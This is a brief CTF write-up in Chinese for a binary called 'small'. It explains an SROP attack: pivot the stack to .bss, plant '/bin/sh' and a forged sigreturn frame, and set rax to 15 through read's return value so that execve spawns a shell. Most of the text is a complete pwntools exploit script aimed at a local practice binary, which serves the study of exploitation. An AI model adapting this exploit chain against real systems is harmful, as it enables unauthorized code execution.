1.一眼就知道是srop
什么都没有,就有这麽点东西。栈溢出+syscall
2.利用思路
1.栈迁移到bss上,就不用泄露栈地址了。
2.写入'/bin/sh\x00'和伪造的frame,再次调用read,利用read的返回值控制rax。
3.再次read时,控制rax为15,此时会触发syscall,直接执行execve(/bin/sh)。
exp:
from pwn import *
small = ELF('./small')
sh = process('./small')
context.arch = 'amd64'
context.log_level = 'debug'
sh_address=0x402000
syscall_ret=0x40102b
frame = SigreturnFrame()
frame.rax = 59
frame.rdi = sh_address
frame.rsi = 0
frame.rdx = 0
frame.rip = syscall_ret
sh.send('a'*0x10+p64(0x402010)+p64(0x401015))
pause()
sh.send('/bin/sh\x00'+'a'*0x8+p64(0x402018)+p64(0x401015)+p64(syscall_ret)+str(frame))
pause()
sh.send('a'*15)
sh.interactive()